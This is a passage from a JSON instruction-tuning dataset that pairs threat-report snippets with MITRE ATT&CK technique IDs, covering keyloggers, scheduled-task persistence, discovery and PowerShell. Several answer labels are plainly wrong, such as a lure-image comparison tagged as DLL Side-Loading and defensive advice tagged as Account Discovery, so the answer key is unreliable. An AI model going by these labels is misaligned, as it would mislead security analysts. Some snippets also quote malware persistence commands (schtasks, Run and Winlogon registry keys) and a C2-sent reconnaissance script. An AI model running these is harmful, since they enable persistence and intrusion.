ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This is a guest post by independent security researcher James Quinn.\u00a0This will be Part 1 of a series titled Reversing Gh0stRAT Variants.\u00a0 As 2018 drew to a close and 2019 took over, I began to see a different behavior from SMB malware authors.\u00a0 Instead of massive, multi-staged cryptocurrency miners, I began to see more small, covert RATs serving as partial stage1\u2019s.\u00a0 Of these samples, there was one specific sample that stood out to me.\u00a0 A Gh0stRAT variant, this sample not only changed the Gh0stRAT header from \u201cGh0st\u201d to \u201cnbLGX\u201d, it also hid its traffic with an encryption algorithm over the entire TCP segment, in addition to the standard Zlib compression on the Gh0stRAT data.\u00a0 Some key functionality is below: Can download more malware Offline Keylogger Cleans Event logs", + "output": "- T1070: Indicator Removal" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The keylogger then records keystrokes in encrypted files, for example: thumbcache_96.dbx", + "output": "- T1056: Input Capture" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "NetWire has a built-in keylogger that can capture inputs from peripheral devices such as USB card readers", + "output": "- T1056: Input Capture" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "63 64 ku64.dll ku32.dll Keylogger & clipboard monitor", + "output": "- T1056: Input Capture" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "However, the campaign that the PDC has recently observed has been delivering this keylogger exclusively", + "output": "- T1056: Input Capture" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "There does appear to be function names however, including PeekMessageA, which has been previously observed in other keylogging malware", + "output": "- T1056: Input Capture" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Keylogging Functionality XAgent also has a keylogger functionality that allows the threat actors to steal credentials as the user types them", + "output": "- T1056: Input Capture" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Figure 1 Side-by-side of the lure images within ThreeDollars in the October 2017 and the January 2018 attacks \u00a0 Superficially, we can immediately see the images are quite similar, but with some glaring differences", + "output": "- T1574.002: Hijack Execution Flow - DLL Side-Loading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Send exfiltrated data taskkill.exe Ends working cycle of modules Persistence Persistence modules are based on scheduled tasks and system registry", + "output": "- T1053: Scheduled Task/Job\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"For newer operating systems, events.exe creates task.xml as follows: Then it creates a Windows scheduled task using the following command: schtasks.exe /create /TN \\\"\"Events\\\\CacheTask_\"\" /XML \\\"\"t /F\"\" At the system registry level, modules achieve persistence by adding themselves into the key: HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit when it finds possible add values to the Winlogon subkey, and in HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Activity Manager\"", + "output": "- T1053: Scheduled Task/Job\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In addition, the PowerShell implant did not contain a mechanism to persist beyond a simple scheduled task", + "output": "- T1053: Scheduled Task/Job\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After execution of every task, the malware sleeps for one minute before executing the next task", + "output": "- T1053: Scheduled Task/Job\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The main similarities include the use of a scheduled task to persistently execute on the system, as well as the same general process to communicate with its C2 server", + "output": "- T1053: Scheduled Task/Job\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The decoded string from the Sch resource is: SchTasks /Create /SC MINUTE /MO 3 /TN \u201c%n%\u201d /TR \u201cwscript %path%\u201d /f The decoded string from the VBS resource is: CreateObject(\u201cWScript.Shell\u201d).Run(\u201c%app%\u201d) The %n% string in the schtasks command above will be replaced with the GUID saved to GDI.bin", + "output": "- T1053: Scheduled Task/Job\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This differs from the previous OopsIE variant that used a hardcoded task name for the scheduled task", + "output": "- T1053: Scheduled Task/Job\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After creating this scheduled task for persistence, the Trojan will begin communicating with its C2 server", + "output": "- T1053: Scheduled Task/Job\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A scheduled task is also generated to maintain persistence of the payload", + "output": "- T1053: Scheduled Task/Job\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Office365DCOMCheck or SystemDiskClean) as the name for the scheduled task to maintain persistence on the victim host", + "output": "- T1053: Scheduled Task/Job\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The malware component, test.exe, uses the Windows command \"\"cmd.exe\"\" /C whoami\u201d to verify it is running with the elevated privileges of \u201cSystem\u201d and creates persistence by creating the following scheduled task: \u00a0\u00a0\u00a0 schtasks /create /tn \"\"mysc\"\" /tr C:\\Users\\Public\\test.exe /sc ONLOGON \u00a0\u00a0\u00a0 /ru \"\"System\"\" When executed, the malware first establishes a SOCKS5 connection to 192.157.198.103 using TCP port 1913\"", + "output": "- T1053: Scheduled Task/Job\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This DLL is used to create a scheduled task that points to the QuasarRAT binary, microsoft_network.exe, allowing it to remain persistent after reboot", + "output": "- T1053: Scheduled Task/Job\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "They use At.exe to schedule tasks to run self-extracting RAR archives, which install either HttpBrowser or PlugX", + "output": "- T1053: Scheduled Task/Job\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Another batch script run by a scheduled task renames the archives on the file server (see Figure 15)", + "output": "- T1053: Scheduled Task/Job\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The scripts create scheduled tasks and also retrieve, decode, and execute a copy of Revenge RAT", + "output": "- T1053: Scheduled Task/Job\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The spreadsheet also creates a scheduled task named \"\"windows update check\"\" that runs the file C:\\Users\\\\.templates\\System Manager.exe every minute.\"", + "output": "- T1053: Scheduled Task/Job\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "When the trojan starts up it will attempt to install a scheduled task with the name of \u201cJava Maintenance64\u201d to keep itself running.", + "output": "- T1053: Scheduled Task/Job\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The campaigns maintain persistence on machines by creating two daily scheduled task entries.", + "output": "- T1053: Scheduled Task/Job\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The script writes files to the path % appdata %\\Roaming\\Microsoft\\Templates\\, then creates two task entries triggered to run daily.", + "output": "- T1053: Scheduled Task/Job\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "On occasions, the phishing emails contained links to external domains to download the first stage, and sometimes the first stage was attached to the email itself", + "output": "- T1598.003: Phishing for Information - Spearphishing Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The first link was labeled as \"\"Comparison of Major Tasks in '16 & '17\"\" and the second link was identified as \"\"Comparison between '16 & '17\"\".Upon opening these links the user was presented with a further decoy Hangul document\"", + "output": "- T1598.003: Phishing for Information - Spearphishing Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Using this example, Comnie will then request data to supply to the BAT script, via the following decrypted request: h=HOSTNAME-PC&f=gethostinfo.bat&c=& Based on network traffic witnessed, the remote C2 server was found to respond with the following information: netstat -ano > %TEMP%\\info.datipconfig /all >> %TEMP%\\info.datroute PRINT >> %TEMP%\\info.datnet view >> %TEMP%\\info.dattasklist >> %TEMP%\\info.datnet user >> %TEMP%\\info.datnet start >> %TEMP%\\info.dat \u00a0 This script is written to a temporary file prior to be executed", + "output": "- T1007: System Service Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The locations: For root user path: /Library/CoreMediaIO/Plug-Ins/FCP-DAL/iOSScreenCapture.plugin/Contents/Resources/ processname: screenassistantd For regular user path: ~/Library/Spelling/ processname: spellagentd Subsequently, it implements the Loader::installLoader method, reading the hardcoded 64-bit Mach-O executable (magic value 0xFEEDFACF), and writing to the previously determined path and file", + "output": "- T1564.001: Hide Artifacts - Hidden Files and Directories" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This field contains a URL that the Trojan will use to upload the contents of the .txt file, which will be structured as . where the process ID is encoded with the same character substitution function as seen previously in Table 4", + "output": "- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Figure 2: Process chain for the first part of the campaign Although the actual VBS script changed from sample to sample, with different levels of obfuscation and different ways of invoking the next stage of process tree, its final purpose remained same: invoking PowerShell to decode the Base64 encoded PowerShell command in the INI file that was dropped earlier by the macro, and executing it", + "output": "- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "What does the Poseidon Group do? What happens after a target machine is infected? Once the target\u2019s machine is compromised, the attacker first enumerates all processes running in the system and all services", + "output": "- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The command does not attempt to kill the specific Office process that would load the particular delivery document, such as Excel in the case of this \u201c.xlam\u201d file, but instead attempts to kill processes associated with Word, Excel, PowerPoint and Publisher", + "output": "- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The tokens for each platform are hardcoded within the sample:November 2016 to January 2017: \"\"Evil New Year\"\" CampaignIn the early part of 2017, Group123 started the \"\"Evil New Year\"\" campaign\"", + "output": "- T1134: Access Token Manipulation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Figure\u00a06 Relational diagram of artifacts\u00a0 We created a timeline of the activity based off the data we collected, and found that the attack dates were tightly clustered into two waves in mid- to late-October and in mid-November as we see in Figure 7 using the timestamps from Table 3", + "output": "- T1562.001: Impair Defenses - Disable or Modify Tools" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Ability to disable Microsoft Office Protected View (as shown in Figure 15) by setting the following keys in the Windows Registry: DisableAttachmentsInPV DisableInternetFilesInPV DisableUnsafeLocationsInPV Figure 15: Disabling Microsoft Office Protected View Ability to remotely reboot or shut down or clean the system based on the command received from the C2 server, as shown in Figure 16", + "output": "- T1562.001: Impair Defenses - Disable or Modify Tools" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "From an infrastructure point of view there is no overlap between the two sets of activity, the only overlap is the use of the unique tool \u201cDNSMessenger\u201d When these points are considered together in conjunction with the significant difference in targeting they make a strong case for classifying this activity as distinct from FIN7 activity", + "output": "- T1562.001: Impair Defenses - Disable or Modify Tools" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Restricting these privileges may prevent malware from running or limit its capability to spread through the network.Carefully consider the risks before granting administrative rights to users on their own machines.Scrub and verify all administrator accounts regularly.Configure Group Policy to restrict all users to only one login session, where possible.Enforce secure network authentication, where possible.Instruct administrators to use non-privileged accounts for standard functions such as web browsing or checking webmail.Segment networks into logical enclaves and restrict host-to-host communication paths", + "output": "- T1087: Account Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "With these outputs, FIN6 was able to identify user accounts that could access additional hosts in the domain", + "output": "- T1087: Account Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The PowerShell script collects all possible information on the user and the network, including snapshots, computer and user names, emails from registry, tasks in task scheduler, system information, AVs registered in the system, privileges, domain and workgroup information", + "output": "- T1087: Account Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Its use of a PowerShell payload means that only legitimate system processes are utilized and that the malicious code execution can only be identified through enhanced logging or in memory", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1546.013: Event Triggered Execution - PowerShell Profile" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Mandiant initially identified an early variant of the POSHSPY backdoor deployed as PowerShell scripts during an incident response engagement in 2015", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1546.013: Event Triggered Execution - PowerShell Profile" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber 